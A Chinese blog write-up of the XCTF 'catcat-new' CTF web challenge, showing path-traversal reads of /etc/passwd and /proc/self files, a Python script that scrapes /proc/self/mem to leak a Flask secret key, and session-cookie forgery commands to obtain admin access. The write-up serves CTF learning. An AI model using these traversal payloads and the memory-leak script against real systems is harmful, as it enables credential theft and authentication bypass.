XCTF-Web-catcat-new

最新推荐文章于 2024-04-17 19:42:02 发布
最新推荐文章于 2024-04-17 19:42:02 发布
阅读量1.9k 收藏 7
点赞数 5
分类专栏: CTF-攻防世界 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45723896/article/details/131399810
版权

查看题目

访问网址:

 

点开其中一个cat

 

观察URL,可以发现URL上使用get请求传递了一个名为file的参数,所以猜测可能存在文件包含漏洞。

在URL上传递参数file=../../../etc/passwd发现存在漏洞

读取当前进程的命令行参数?file=../../../../proc/self/cmdline,发现有一个通过python启动app.py的命令。 所以可以得出该网站使用Python框架,并且因为有app.py可知使用的是flask框架。

尝试读取app.py文件。

复制文本内容,将字符串f-string格式化输出美化一下。

import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
    __name__,
    static_url_path='/',
    static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"  # 此处利用uuid.uuid4()生成了一串id字符串并在后面拼接*abcdefgh
if os.path.isfile("/flag"):  # 导入flag文件并删除掉
    flag = cat("/flag")
    os.remove("/flag")


@app.route('/', methods=['GET'])
def index():
    detailtxt = os.listdir('./details/')
    cats_list = []
    for i in detailtxt:
        cats_list.append(i[:i.index('.')])

    return render_template("index.html", cats_list=cats_list, cat=cat)


@app.route('/info', methods=["GET", 'POST'])
def info():
    filename = "./details/" + request.args.get('file', "")
    start = request.args.get('start', "0")
    end = request.args.get('end', "0")
    name = request.args.get('file', "")[:request.args.get('file', "").index('.')]

    return render_template("detail.html", catname=name, info=cat(filename, start, end))


@app.route('/admin', methods=["GET"])  # 在session信息中admin=1的用户在/admin路径下访问网站可以获得flag,所以要伪造session。
def admin_can_list_root():
    if session.get('admin') == 1:
        return flag
    else:
        session['admin'] = 0
    return "NoNoNo"


if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=False, port=5637)

 以上就是app.py的代码

flask_session的伪造需要用到secret_key,而secret_key的值可以通过内存数据获取。先读取/proc/self/maps文件获取可读内容的内存映射地址。

info?file=../../../proc/self/maps

 执行破解脚本

# coding=utf-8
#----------------------------------
###################################
#Edited by lx56@blog.lxscloud.top
###################################
#----------------------------------
import requests
import re
import ast, sys
from abc import ABC
from flask.sessions import SecureCookieSessionInterface


url = "http://61.147.171.105:65402/"

#此程序只能运行于Python3以上
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')

#----------------session 伪造,单独用也可以考虑这个库: https://github.com/noraj/flask-session-cookie-manager ----------------
class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key
        
class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            #Encode a Flask session cookie
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e
#由/proc/self/maps获取可读写的内存地址,再根据这些地址读取/proc/self/mem来获取secret key
s_key = ""
bypass = "../.."
#请求file路由进行读取
map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\\n")
for i in map_list:
    #匹配指定格式的地址
    map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
    if map_addr:
        start = int(map_addr.group(1), 16)
        end = int(map_addr.group(2), 16)
        print("Found rw addr:", start, "-", end)
        
        #设置起始和结束位置并读取/proc/self/mem
        res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
        #用到了之前特定的SECRET_KEY格式。如果发现*abcdefgh存在其中,说明成功泄露secretkey
        if "*abcdefgh" in res.text:
            #正则匹配,本题secret key格式为32个小写字母或数字,再加上*abcdefgh
            secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", res.text)
            if secret_key:
                print("Secret Key:", secret_key[0])
                s_key = secret_key[0]
                break

运行脚本得到Secret Key:dd2f770c1e2f4576af5bc1a6c7628ad4*abcdefgh

 

session在访问/admin路径时的cookie中,访问http://61.147.171.105:65402/admin

通过抓包得到session

 利用工具flask_session_cookie_manager伪造session,先下载flask_session_cookie_manager工具,使用下列命令生成session

 python flask_session_cookie_manager3.py decode -s “secret_key” -c “session” 

python flask_session_cookie_manager3.py encode -s "dd2f770c1e2f4576af5bc1a6c7628ad4*abcdefgh" -t "{'admin':1}"

 得到伪造的session,使用burpsuite更改session并执行,得到flag。

 

 本题知识点:

Linux系统敏感文件,flask_session_cookie_manager伪造session并执行,session存储在cookie中

/etc/passwd

该文件储存了该Linux系统中所有用户的一些基本信息,只有root权限才可以修改。其具体格式为      用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell(以冒号作为分隔符)

/proc/self

proc是一个伪文件系统,它提供了内核数据结构的接口。内核数据是在程序运行时存储在内部半导体存储器中数据。通过/proc/PID可以访问对应PID的进程内核数据,而/proc/self访问的是当前进程的内核数据。

/proc/self/cmdline

该文件包含的内容为当前进程执行的命令行参数。

/proc/self/mem

/proc/self/mem是当前进程的内存内容,通过修改该文件相当于直接修改当前进程的内存数据。但是注意该文件不能直接读取,因为文件中存在着一些无法读取的未被映射区域。所以要结合/proc/self/maps中的偏移地址进行读取。通过参数start和end及偏移地址值读取内容。

/proc/self/maps

/proc/self/maps包含的内容是当前进程的内存映射关系,可通过读取该文件来得到内存数据映射的地址。

flask-session结构

 flask_session是flask框架实现session功能的一个插件。其session结构分为三部分:序列化内容+时间+防篡改值,这三部分内容加密后以符号 “.”来进行分隔。flask_session默认session的储存是在用户Cookie中。但也可以指定存储在数据库,缓存中间件,服务器本地文件等等之中。

参考资料:

(1条消息) 【愚公系列】2023年05月 攻防世界-Web(catcat-new)_愚公搬代码的博客-CSDN博客icon-default.png?t=N5K3https://blog.csdn.net/aa2528877987/article/details/130880367?ops_request_misc=&request_id=&biz_id=102&utm_term=catcat-new&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-130880367.142^v88^control,239^v2^insert_chatgpt&spm=1018.2226.3001.4187

攻防世界-cat_cat_new(flask_session伪造、/proc/self/文件夹) - 你呀你~ - 博客园 (cnblogs.com)icon-default.png?t=N5K3https://www.cnblogs.com/niyani/p/17074125.html

 

weixin_45723896
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
XCTF-HW-pipeline附件
11-09
附件
网络安全/CTF】catcat-new
等风来
12-25 1943
读取了/proc/self/maps获得了应用运行的内存映射信息,接下来的思路就是:读取/proc/self/mem获得当前内存的详细信息,由于在app.py的info()方法从HTTP请求中接收了start和end参数,即可传参,从而读取任意文件中任意两个地址之间的数据,最后使用正则表达式匹配字符串\w+{\w+}直接获取flag
攻防世界-Cat
asenzhenshuai的博客
07-14 2222
攻防世界Cat(XCTF 4th-WHCTF-2017)
XYCTF 部分wp及学习记录
最新发布
m0_75178803的博客
04-17 2209
根据题目提示我们知道应该是要上传两张md5值相同的图片把保存下来的图片上传一下得到flag。
XCTF-CAT
aaeoj8957的博客
07-17 391
果然还是我太菜了呜呜呜,这道题仍然是没有自己做出来。哎。 这一道用的并不是PHP的环境,而是用Python中的Django编写的。 记得做过类似的一道题目。来源于MOCTF中的网站扫描器,当时做完后其实一回想,后台用的应该是file_get_contents类似的函数,还应该开启了远程包含之类的。然后我们才可以直接输入url返回页面的源码等等。 但是这个感觉...
Xctf:CAT
羽的博客
07-23 454
尝试了很多命令执行的,发现并不是命令执行 而在URL中具备URL解析功能 可以在URL中输入%79 尝试。 然后就是一个Djiano的特性和PHP的特性。 在报错信息中可以找到 不看看dalao的wp我怎么做啊 ...
【愚公系列】2023年05月 攻防世界-Webcatcat-new
热门推荐
时光隧道
05-26 1万+
任意文件读取漏洞是指攻击者通过在应用程序中输入非法的文件名或路径,从而获取未授权的文件读取权限的漏洞。攻击者可以利用此漏洞来读取系统文件、敏感数据或其他用户数据。这种漏洞通常是由于程序没有正确地检查用户的输入而引起的。建议开发人员在编写应用程序时进行严格的输入验证并使用安全的文件访问方法来避免此类漏洞的发生。
攻防世界catcat-new
qq_45955869的博客
05-28 1379
攻防世界catcat-new
XCTF-WEB
qq_43661408的博客
06-22 482
post和get 题目链接:http://111.198.29.45:34348/ 解题思路 首先使用 get方式提交变量a等于1 即 http://111.198.29.45:34348/?a=1 得到 第二条信息 需要使用post提交一个变量b值为2 因此使用火狐自带的插件hackbar,但是现在火狐更新后不能使用了,替代hackbar的插件有了 Max hackbar 和 hackbar q...
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF---web
空の城的博客
10-27 366
view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 打开页面后右键查看不了源代码,从题目中可以知道小宁想要看源代码,所以按F12查看发现flag robots 题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 根据题目提示,找到网站目录下的robots.txt 直接访问即可获得flag backup 题目描述:X老师忘记删除备份文件,他派小宁同学去把备份文件找出来...
webcatcat-new(文件包含漏洞、flask_session伪造)
sleepywin的博客
11-30 739
proc/self/mem是当前进程的内存内容,通过修改该文件相当于直接修改当前进程的内存数据。通过/proc/PID可以访问对应PID的进程内核数据,而/proc/self访问的是当前进程的内核数据。flask_session的伪造需要用到secret_key,而secret_key的值可以通过内存数据获取。先读取/proc/self/maps文件获取可读内容的内存映射地址。/proc/self/maps包含的内容是当前进程的内存映射关系,可通过读取该文件来得到内存数据映射的地址。
XCTFcat
Keepb1ue的博客
01-12 3298
django编码问题配合CURLOPT_SAFE_UPLOAD导致任意文件读取 php cURL CURLOPT_SAFE_UPLOAD django DEBUG mode
XCTF Cat writeup
stepone4ward的博客
07-04 3505
刚看到题目的时候猜测是否是需要利用任意命令执行cat来读取文件的内容,后来才发现原来CAT是Cloud Automated Testing的缩写… 猜测1 测试输入127.0.0.1发现网站起到了检测目标站点网络是否连通(ping)的作用,我们都知道ping是一个php当中很危险的函数,可以利用|实现任意命令执行,测试payload:127.0.0.1|phpinfo();,得到返回为Inval...
XCTF 进阶区 CAT
YenKoc的博客
12-05 754
这题脑洞是真的大,讲道理 看到这个,先尝试了一下命令拼接,发现字符被过滤了应该。fuzz一下看看,有哪些字符还没被过滤了 import requests dictory=["!","@","#","$","%","^","&","*","(",")","[","]","?","<",">",",",".","/","'",":","|","\\","`",":"] sess...
java中 cat=new Cat()_调用链监控 CAT 之 入门
weixin_31893057的博客
02-27 675
简介CAT 是一个实时和接近全量的监控系统,它侧重于对Java应用的监控,基本接入了美团上海所有核心应用。目前在中间件(MVC、RPC、数据库、缓存等)框架中得到广泛应用,为美团各业务线提供系统的性能指标、健康状况、监控告警等。优势实时处理:信息的价值会随时间锐减,尤其是事故处理过程中。全量数据:全量采集指标数据,便于深度分析故障案例。高可用:故障的还原与问题定位,需要高可用监控来支撑。故障容忍:...
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息,我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目,要求读取文件并进行一些操作,同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值